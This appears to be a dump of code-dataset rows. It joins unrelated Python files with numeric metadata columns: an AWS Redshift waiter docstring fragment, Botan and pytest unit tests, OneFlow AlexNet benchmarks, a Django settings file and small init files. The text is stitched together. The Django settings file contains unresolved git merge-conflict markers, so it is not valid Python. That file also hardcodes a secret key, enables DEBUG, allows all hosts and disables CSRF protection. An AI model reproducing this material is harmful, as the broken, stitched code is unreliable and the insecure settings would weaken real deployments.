The type of snapshots for which you are requesting information. By default, snapshots of all types are returned.
Valid Values: ``automated`` | ``manual``
:type StartTime: datetime
:param StartTime:
A value that requests only snapshots created at or after the specified time. The time value is specified in ISO 8601 format. For more information about ISO 8601, go to the `ISO8601 Wikipedia page. <http://en.wikipedia.org/wiki/ISO_8601>`__
Example: ``2012-07-16T18:00:00Z``
:type EndTime: datetime
:param EndTime:
A time value that requests only snapshots created at or before the specified time. The time value is specified in ISO 8601 format. For more information about ISO 8601, go to the `ISO8601 Wikipedia page. <http://en.wikipedia.org/wiki/ISO_8601>`__
Example: ``2012-07-16T18:00:00Z``
:type MaxRecords: integer
:param MaxRecords:
The maximum number of response records to return in each call. If the number of remaining response records exceeds the specified ``MaxRecords`` value, a value is returned in a ``marker`` field of the response. You can retrieve the next set of records by retrying the command with the returned marker value.
Default: ``100``
Constraints: minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional parameter that specifies the starting point to return a set of response records. When the results of a DescribeClusterSnapshots request exceed the value specified in ``MaxRecords`` , AWS returns a value in the ``Marker`` field of the response. You can retrieve the next set of response records by providing the returned marker value in the ``Marker`` parameter and retrying the request.
:type OwnerAccount: string
:param OwnerAccount:
The AWS customer account used to create or copy the snapshot. Use this field to filter the results to snapshots owned by a particular account. To describe snapshots you own, either specify your AWS customer account, or do not specify the parameter.
:type TagKeys: list
:param TagKeys:
A tag key or keys for which you want to return all matching cluster snapshots that are associated with the specified key or keys. For example, suppose that you have snapshots that are tagged with keys called ``owner`` and ``environment`` . If you specify both of these tag keys in the request, Amazon Redshift returns a response with the snapshots that have either or both of these tag keys associated with them.
- *(string) --*
:type TagValues: list
:param TagValues:
A tag value or values for which you want to return all matching cluster snapshots that are associated with the specified tag value or values. For example, suppose that you have snapshots that are tagged with values called ``admin`` and ``test`` . If you specify both of these tag values in the request, Amazon Redshift returns a response with the snapshots that have either or both of these tag values associated with them.
- *(string) --*
:type ClusterExists: boolean
:param ClusterExists:
A value that indicates whether to return snapshots only for an existing cluster. You can perform table-level restore only by using a snapshot of an existing cluster, that is, a cluster that has not been deleted. Values for this parameter work as follows:
* If ``ClusterExists`` is set to ``true`` , ``ClusterIdentifier`` is required.
* If ``ClusterExists`` is set to ``false`` and ``ClusterIdentifier`` isn\'t specified, all snapshots associated with deleted clusters (orphaned snapshots) are returned.
* If ``ClusterExists`` is set to ``false`` and ``ClusterIdentifier`` is specified for a deleted cluster, snapshots associated with that cluster are returned.
* If ``ClusterExists`` is set to ``false`` and ``ClusterIdentifier`` is specified for an existing cluster, no snapshots are returned.
:type SortingEntities: list
:param SortingEntities:
- *(dict) --*
Describes a sorting entity
- **Attribute** *(string) --* **[REQUIRED]**
The category for sorting the snapshots.
- **SortOrder** *(string) --*
The order for listing the attributes.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 15
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 20
:returns: None
"""
pass
| 65.558824
| 433
| 0.654666
| 2,210
| 17,832
| 5.274208
| 0.11629
| 0.012011
| 0.0151
| 0.019218
| 0.841198
| 0.836393
| 0.832447
| 0.826012
| 0.811599
| 0.811599
| 0
| 0.0158
| 0.275965
| 17,832
| 271
| 434
| 65.800738
| 0.886996
| 0.821837
| 0
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.25
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
a6a22f3f0b5a35cc40fc045991acd2d353405a71
| 8,658
|
py
|
Python
|
src/scripts/python_unittests.py
|
clayne/botan
|
1f16adea08c4c9bf3fb0fbf699d284cb48150898
|
[
"BSD-2-Clause"
] | 1,988
|
2015-01-04T02:58:16.000Z
|
2022-03-31T18:03:37.000Z
|
src/scripts/python_unittests.py
|
evpo/botan
|
6f8a696962c3aa605e9e5a53710c96dcb8477c9f
|
[
"BSD-2-Clause"
] | 2,455
|
2015-01-04T17:53:39.000Z
|
2022-03-30T18:15:31.000Z
|
src/scripts/python_unittests.py
|
evpo/botan
|
6f8a696962c3aa605e9e5a53710c96dcb8477c9f
|
[
"BSD-2-Clause"
] | 590
|
2015-01-07T04:05:12.000Z
|
2022-03-30T20:42:05.000Z
|
#!/usr/bin/env python3
"""
Unittests for Botan Python scripts.
Requires Python 3.
(C) 2017 Simon Warta (Kullo GmbH)
Botan is released under the Simplified BSD License (see license.txt)
"""
import sys
import unittest
sys.path.append("../..") # Botan repo root
from configure import AmalgamationHelper # pylint: disable=wrong-import-position
from configure import ModulesChooser # pylint: disable=wrong-import-position
class AmalgamationHelperTests(unittest.TestCase):
def test_matcher_std_includes(self):
self.assertEqual(AmalgamationHelper.is_unconditional_std_include("#include <string>"), "string")
self.assertEqual(AmalgamationHelper.is_unconditional_std_include("#include <string> // comment"), "string")
self.assertEqual(AmalgamationHelper.is_unconditional_std_include("#include <myfile.h>"), None)
self.assertEqual(AmalgamationHelper.is_unconditional_std_include("#include <unistd.h>"), None)
self.assertEqual(AmalgamationHelper.is_unconditional_std_include(" #include <string>"), None)
def test_matcher_botan_include(self):
self.assertEqual(AmalgamationHelper.is_botan_include("#include <botan/oids.h>"),
"oids.h")
self.assertEqual(AmalgamationHelper.is_botan_include("#include <botan/internal/socket.h>"),
"internal/socket.h")
self.assertEqual(AmalgamationHelper.is_botan_include("#include <botan/oids.h> // comment"),
"oids.h")
self.assertEqual(AmalgamationHelper.is_botan_include("#include <botan/internal/socket.h> // comment"),
"internal/socket.h")
self.assertEqual(AmalgamationHelper.is_botan_include(" #include <botan/oids.h>"),
"oids.h")
self.assertEqual(AmalgamationHelper.is_botan_include(" #include <botan/internal/socket.h>"),
"internal/socket.h")
self.assertEqual(AmalgamationHelper.is_botan_include("#include <string>"), None)
self.assertEqual(AmalgamationHelper.is_botan_include("#include <myfile.h>"), None)
self.assertEqual(AmalgamationHelper.is_botan_include("#include <unistd.h>"), None)
def test_matcher_any_includes(self):
self.assertEqual(AmalgamationHelper.is_any_include("#include <string>"), "string")
self.assertEqual(AmalgamationHelper.is_any_include("#include <myfile.h>"), "myfile.h")
self.assertEqual(AmalgamationHelper.is_any_include("#include <unistd.h>"), "unistd.h")
self.assertEqual(AmalgamationHelper.is_any_include("#include <botan/oids.h>"),
"botan/oids.h")
self.assertEqual(AmalgamationHelper.is_any_include(" #include <string>"), "string")
self.assertEqual(AmalgamationHelper.is_any_include(" #include <myfile.h>"), "myfile.h")
self.assertEqual(AmalgamationHelper.is_any_include(" #include <unistd.h>"), "unistd.h")
self.assertEqual(AmalgamationHelper.is_any_include(" #include <botan/oids.h>"),
"botan/oids.h")
self.assertEqual(AmalgamationHelper.is_any_include("#include <string> // comment"), "string")
self.assertEqual(AmalgamationHelper.is_any_include("#include <myfile.h> // comment"), "myfile.h")
self.assertEqual(AmalgamationHelper.is_any_include("#include <unistd.h> // comment"), "unistd.h")
self.assertEqual(AmalgamationHelper.is_any_include("#include <botan/oids.h> // comment"),
"botan/oids.h")
class ModulesChooserResolveDependencies(unittest.TestCase):
def test_base(self):
available_modules = set(["A", "B"])
table = {
"A": [],
}
ok, modules = ModulesChooser.resolve_dependencies(available_modules, table, "A")
self.assertTrue(ok)
self.assertEqual(modules, set(["A"]))
def test_no_dependencies_defined(self):
available_modules = set(["A", "B"])
table = {
"A": [],
}
with self.assertRaises(KeyError):
ModulesChooser.resolve_dependencies(available_modules, table, "B")
available_modules = set(["A", "B"])
table = {
"A": ["B"],
}
with self.assertRaises(KeyError):
ModulesChooser.resolve_dependencies(available_modules, table, "A")
def test_add_dependency(self):
available_modules = set(["A", "B"])
table = {
"A": ["B"],
"B": []
}
ok, modules = ModulesChooser.resolve_dependencies(available_modules, table, "A")
self.assertTrue(ok)
self.assertEqual(modules, set(["A", "B"]))
def test_add_dependencies_two_levels(self):
available_modules = set(["A", "B", "C"])
table = {
"A": ["B"],
"B": ["C"],
"C": []
}
ok, modules = ModulesChooser.resolve_dependencies(available_modules, table, "A")
self.assertTrue(ok)
self.assertEqual(modules, set(["A", "B", "C"]))
def test_circular(self):
available_modules = set(["A", "B", "C"])
table = {
"A": ["B"],
"B": ["C"],
"C": ["A"]
}
ok, modules = ModulesChooser.resolve_dependencies(available_modules, table, "A")
self.assertTrue(ok)
self.assertEqual(modules, set(["A", "B", "C"]))
def test_not_available(self):
available_modules = set(["A", "C"])
table = {
"A": ["B"],
"B": ["C"],
"C": ["A"]
}
ok, _ = ModulesChooser.resolve_dependencies(available_modules, table, "B")
self.assertFalse(ok)
def test_dependency_not_available(self):
available_modules = set(["A", "C"])
table = {
"A": ["B"],
"B": ["C"],
"C": ["A"]
}
ok, _ = ModulesChooser.resolve_dependencies(available_modules, table, "A")
self.assertFalse(ok)
def test_dependency2_not_available(self):
available_modules = set(["A", "B"])
table = {
"A": ["B"],
"B": ["C"],
"C": ["A"]
}
ok, _ = ModulesChooser.resolve_dependencies(available_modules, table, "A")
self.assertFalse(ok)
def test_dependency_choices(self):
available_modules = set(["A", "B", "C"])
table = {
"A": ["B|C"],
"B": [],
"C": []
}
ok, modules = ModulesChooser.resolve_dependencies(available_modules, table, "A")
self.assertTrue(ok)
self.assertTrue(modules == set(["A", "B"]) or modules == set(["A", "C"]))
def test_dependency_prefer_existing(self):
available_modules = set(["A", "B", "C"])
table = {
"A": ["C", "B|C"],
"B": [],
"C": []
}
ok, modules = ModulesChooser.resolve_dependencies(available_modules, table, "A")
self.assertTrue(ok)
self.assertEqual(modules, set(["A", "C"]))
def test_dependency_prefer_existing2(self):
available_modules = set(["A", "B", "C"])
table = {
"A": ["B", "B|C"],
"B": [],
"C": []
}
ok, modules = ModulesChooser.resolve_dependencies(available_modules, table, "A")
self.assertTrue(ok)
self.assertEqual(modules, set(["A", "B"]))
def test_dependency_choices_impossible(self):
available_modules = set(["A", "C"])
table = {
"A": ["B|C"],
"B": [],
"C": []
}
ok, modules = ModulesChooser.resolve_dependencies(available_modules, table, "A")
self.assertTrue(ok)
self.assertEqual(modules, set(["A", "C"]))
def test_dependency_choices_impossible2(self):
available_modules = set(["A", "B"])
table = {
"A": ["B|C"],
"B": [],
"C": []
}
ok, modules = ModulesChooser.resolve_dependencies(available_modules, table, "A")
self.assertTrue(ok)
self.assertEqual(modules, set(["A", "B"]))
def test_deep(self):
available_modules = set(["A", "B", "C", "E", "G"])
table = {
"A": ["B|C"],
"B": ["D"],
"C": ["E"],
"D": [],
"E": ["F|G"],
"F": ["A", "B"],
"G": ["A", "G"]
}
ok, modules = ModulesChooser.resolve_dependencies(available_modules, table, "G")
self.assertTrue(ok)
self.assertEqual(modules, set(["G", "A", "C", "E"]))
if __name__ == '__main__':
unittest.TestCase.longMessage = True
unittest.main()
| 38.48
| 115
| 0.575075
| 887
| 8,658
| 5.43743
| 0.118377
| 0.108853
| 0.177898
| 0.188679
| 0.848227
| 0.828737
| 0.811735
| 0.794734
| 0.741655
| 0.661621
| 0
| 0.001413
| 0.264264
| 8,658
| 224
| 116
| 38.651786
| 0.75573
| 0.031647
| 0
| 0.613757
| 0
| 0
| 0.119551
| 0.008957
| 0
| 0
| 0
| 0
| 0.269841
| 1
| 0.089947
| false
| 0
| 0.021164
| 0
| 0.121693
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6d8984df7d60279f2ca75abcc73778b1ab427c3
| 1,287
|
py
|
Python
|
benchmark/test_alexnet.py
|
Oneflow-Inc/vision
|
352e9240f63118112ea174bb2d0b502fa54be16f
|
[
"BSD-3-Clause"
] | 40
|
2021-10-19T02:34:56.000Z
|
2022-03-25T07:49:44.000Z
|
benchmark/test_alexnet.py
|
Oneflow-Inc/vision
|
352e9240f63118112ea174bb2d0b502fa54be16f
|
[
"BSD-3-Clause"
] | 53
|
2021-10-22T02:24:44.000Z
|
2022-03-31T04:20:47.000Z
|
benchmark/test_alexnet.py
|
Oneflow-Inc/vision
|
352e9240f63118112ea174bb2d0b502fa54be16f
|
[
"BSD-3-Clause"
] | 11
|
2022-01-06T02:57:07.000Z
|
2022-03-23T15:19:51.000Z
|
from benchmark import *
import oneflow_benchmark
from flowvision.models.alexnet import alexnet
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_alexnet_batch_size1(benchmark, net=alexnet, input_shape=[1, 3, 224, 224]):
model, x, optimizer = fetch_args(net, input_shape)
benchmark(run, model, x, optimizer)
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_alexnet_batch_size2(benchmark, net=alexnet, input_shape=[2, 3, 224, 224]):
model, x, optimizer = fetch_args(net, input_shape)
benchmark(run, model, x, optimizer)
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_alexnet_batch_size4(benchmark, net=alexnet, input_shape=[4, 3, 224, 224]):
model, x, optimizer = fetch_args(net, input_shape)
benchmark(run, model, x, optimizer)
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_alexnet_batch_size8(benchmark, net=alexnet, input_shape=[8, 3, 224, 224]):
model, x, optimizer = fetch_args(net, input_shape)
benchmark(run, model, x, optimizer)
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_alexnet_batch_size16(benchmark, net=alexnet, input_shape=[16, 3, 224, 224]):
model, x, optimizer = fetch_args(net, input_shape)
benchmark(run, model, x, optimizer)
| 37.852941
| 85
| 0.737374
| 182
| 1,287
| 4.989011
| 0.197802
| 0.110132
| 0.165198
| 0.143172
| 0.875551
| 0.715859
| 0.715859
| 0.715859
| 0.715859
| 0.715859
| 0
| 0.045936
| 0.120435
| 1,287
| 33
| 86
| 39
| 0.756184
| 0
| 0
| 0.652174
| 0
| 0
| 0.03108
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.217391
| false
| 0
| 0.130435
| 0
| 0.347826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b296994533fb66c27fe0e7681ef3cf94c5ef1a4
| 8,032
|
py
|
Python
|
tantan/settings.py
|
wei6740714/tantan
|
94bfac3a55841bfab4f8d656026ddab9013a9df0
|
[
"MIT"
] | null | null | null |
tantan/settings.py
|
wei6740714/tantan
|
94bfac3a55841bfab4f8d656026ddab9013a9df0
|
[
"MIT"
] | null | null | null |
tantan/settings.py
|
wei6740714/tantan
|
94bfac3a55841bfab4f8d656026ddab9013a9df0
|
[
"MIT"
] | null | null | null |
<<<<<<< HEAD
"""
Django settings for tantan project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'u_u$r8po3p3r@%-q07ms2vi=%7#ovh#9lp%ks%&z*behnnueh2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tantan.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
],
},
},
]
WSGI_APPLICATION = 'tantan.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'zh-cn'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
=======
"""
Django settings for tantan project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'u_u$r8po3p3r@%-q07ms2vi=%7#ovh#9lp%ks%&z*behnnueh2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'user',
'social',
'vip',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'common.middleware.MiddlewareAuth',
'common.middleware.MiddlewareException',
]
ROOT_URLCONF = 'tantan.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'tantan.wsgi.application'
# Django的缓存配置
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379/9",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
}
}
}
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = 'static/'
MEDIA_URL = 'media/'
#########################
## Django Logging BEGIN
#########################
# LOGGING_DIR 日志文件存放目录
LOGGING_DIR = os.path.join(BASE_DIR, "logs")
if not os.path.exists(LOGGING_DIR):
os.mkdir(LOGGING_DIR)
import logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(levelname)s %(asctime)s %(filename)s %(funcName)s %(lineno)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s',
'datefmt': '%Y-%m-%d %H:%M:%S'
},
},
'filters': {
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'file_handler': {
'level': 'INFO',
'class': 'logging.handlers.TimedRotatingFileHandler',
'filename': '%s/django.log' % LOGGING_DIR,
'formatter':'standard',
'encoding': 'utf-8'
}, # 用于文件输出
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'formatter':'standard'
},
},
'loggers': {
'mdjango': {
'handlers': ['file_handler'],
'level':'DEBUG',
'propagate': True,
},
'django.request': {
# 一个记录器中可以使用多个处理器
'handlers': ['console','mail_admins'],
'level': 'ERROR',
'propagate': False,
},
}
}
#########################
## Django Logging END
#########################
>>>>>>> 51434351d03eef12202b428265949b72c76c29a7
| 25.498413
| 98
| 0.625996
| 818
| 8,032
| 6.050122
| 0.271394
| 0.049909
| 0.062235
| 0.070721
| 0.746615
| 0.728632
| 0.728632
| 0.728632
| 0.728632
| 0.728632
| 0
| 0.020704
| 0.218252
| 8,032
| 314
| 99
| 25.579618
| 0.767479
| 0.190239
| 0
| 0.421053
| 1
| 0.005263
| 0.49707
| 0.353223
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.052632
| 0.015789
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
5b7519f27d87a83dcd562f2f6ce7f53de5947a3d
| 4,085
|
py
|
Python
|
testing/test_threadexception.py
|
markshao/pytest
|
611b579d21f7e62b4c8ed54ab70fbfee7c6f5f64
|
[
"MIT"
] | 9,225
|
2015-06-15T21:56:14.000Z
|
2022-03-31T20:47:38.000Z
|
testing/test_threadexception.py
|
markshao/pytest
|
611b579d21f7e62b4c8ed54ab70fbfee7c6f5f64
|
[
"MIT"
] | 7,794
|
2015-06-15T21:06:34.000Z
|
2022-03-31T10:56:54.000Z
|
testing/test_threadexception.py
|
markshao/pytest
|
611b579d21f7e62b4c8ed54ab70fbfee7c6f5f64
|
[
"MIT"
] | 2,598
|
2015-06-15T21:42:39.000Z
|
2022-03-29T13:48:22.000Z
|
import sys
import pytest
from _pytest.pytester import Pytester
if sys.version_info < (3, 8):
pytest.skip("threadexception plugin needs Python>=3.8", allow_module_level=True)
@pytest.mark.filterwarnings("default::pytest.PytestUnhandledThreadExceptionWarning")
def test_unhandled_thread_exception(pytester: Pytester) -> None:
pytester.makepyfile(
test_it="""
import threading
def test_it():
def oops():
raise ValueError("Oops")
t = threading.Thread(target=oops, name="MyThread")
t.start()
t.join()
def test_2(): pass
"""
)
result = pytester.runpytest()
assert result.ret == 0
assert result.parseoutcomes() == {"passed": 2, "warnings": 1}
result.stdout.fnmatch_lines(
[
"*= warnings summary =*",
"test_it.py::test_it",
" * PytestUnhandledThreadExceptionWarning: Exception in thread MyThread",
" ",
" Traceback (most recent call last):",
" ValueError: Oops",
" ",
" warnings.warn(pytest.PytestUnhandledThreadExceptionWarning(msg))",
]
)
@pytest.mark.filterwarnings("default::pytest.PytestUnhandledThreadExceptionWarning")
def test_unhandled_thread_exception_in_setup(pytester: Pytester) -> None:
pytester.makepyfile(
test_it="""
import threading
import pytest
@pytest.fixture
def threadexc():
def oops():
raise ValueError("Oops")
t = threading.Thread(target=oops, name="MyThread")
t.start()
t.join()
def test_it(threadexc): pass
def test_2(): pass
"""
)
result = pytester.runpytest()
assert result.ret == 0
assert result.parseoutcomes() == {"passed": 2, "warnings": 1}
result.stdout.fnmatch_lines(
[
"*= warnings summary =*",
"test_it.py::test_it",
" * PytestUnhandledThreadExceptionWarning: Exception in thread MyThread",
" ",
" Traceback (most recent call last):",
" ValueError: Oops",
" ",
" warnings.warn(pytest.PytestUnhandledThreadExceptionWarning(msg))",
]
)
@pytest.mark.filterwarnings("default::pytest.PytestUnhandledThreadExceptionWarning")
def test_unhandled_thread_exception_in_teardown(pytester: Pytester) -> None:
pytester.makepyfile(
test_it="""
import threading
import pytest
@pytest.fixture
def threadexc():
def oops():
raise ValueError("Oops")
yield
t = threading.Thread(target=oops, name="MyThread")
t.start()
t.join()
def test_it(threadexc): pass
def test_2(): pass
"""
)
result = pytester.runpytest()
assert result.ret == 0
assert result.parseoutcomes() == {"passed": 2, "warnings": 1}
result.stdout.fnmatch_lines(
[
"*= warnings summary =*",
"test_it.py::test_it",
" * PytestUnhandledThreadExceptionWarning: Exception in thread MyThread",
" ",
" Traceback (most recent call last):",
" ValueError: Oops",
" ",
" warnings.warn(pytest.PytestUnhandledThreadExceptionWarning(msg))",
]
)
@pytest.mark.filterwarnings("error::pytest.PytestUnhandledThreadExceptionWarning")
def test_unhandled_thread_exception_warning_error(pytester: Pytester) -> None:
pytester.makepyfile(
test_it="""
import threading
import pytest
def test_it():
def oops():
raise ValueError("Oops")
t = threading.Thread(target=oops, name="MyThread")
t.start()
t.join()
def test_2(): pass
"""
)
result = pytester.runpytest()
assert result.ret == pytest.ExitCode.TESTS_FAILED
assert result.parseoutcomes() == {"passed": 1, "failed": 1}
| 29.601449
| 86
| 0.574541
| 367
| 4,085
| 6.275204
| 0.20436
| 0.036474
| 0.041685
| 0.086843
| 0.898393
| 0.898393
| 0.898393
| 0.866261
| 0.866261
| 0.840643
| 0
| 0.00673
| 0.308935
| 4,085
| 137
| 87
| 29.817518
| 0.809068
| 0
| 0
| 0.786325
| 0
| 0
| 0.552509
| 0.154712
| 0
| 0
| 0
| 0
| 0.068376
| 1
| 0.034188
| false
| 0.08547
| 0.08547
| 0
| 0.119658
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
751d377e6f4be7226dfb0167e80560decdaf06b5
| 185
|
py
|
Python
|
AgentRL/common/exploration/__init__.py
|
hemerson1/AgentRL
|
581727191ba81e1d7f57661511c856bc4c2725ad
|
[
"MIT"
] | null | null | null |
AgentRL/common/exploration/__init__.py
|
hemerson1/AgentRL
|
581727191ba81e1d7f57661511c856bc4c2725ad
|
[
"MIT"
] | null | null | null |
AgentRL/common/exploration/__init__.py
|
hemerson1/AgentRL
|
581727191ba81e1d7f57661511c856bc4c2725ad
|
[
"MIT"
] | null | null | null |
from AgentRL.common.exploration.base import base_exploration
from AgentRL.common.exploration.argmax import default_argmax
from AgentRL.common.exploration.e_greedy import epsilon_greedy
| 46.25
| 62
| 0.886486
| 25
| 185
| 6.4
| 0.44
| 0.20625
| 0.31875
| 0.525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064865
| 185
| 3
| 63
| 61.666667
| 0.924855
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
752ac90c2376d453e2923d72080fdab554003bb5
| 27
|
py
|
Python
|
tests/bind/good/fun-basic.py
|
Nakrez/RePy
|
057db55a99eac2c5cb3d622fa1f2e29f6083d8d6
|
[
"MIT"
] | 1
|
2020-11-24T05:24:26.000Z
|
2020-11-24T05:24:26.000Z
|
tests/bind/good/fun-basic.py
|
Nakrez/RePy
|
057db55a99eac2c5cb3d622fa1f2e29f6083d8d6
|
[
"MIT"
] | null | null | null |
tests/bind/good/fun-basic.py
|
Nakrez/RePy
|
057db55a99eac2c5cb3d622fa1f2e29f6083d8d6
|
[
"MIT"
] | null | null | null |
def x():
return 1
x()
| 5.4
| 12
| 0.444444
| 5
| 27
| 2.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0.37037
| 27
| 4
| 13
| 6.75
| 0.647059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0.333333
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
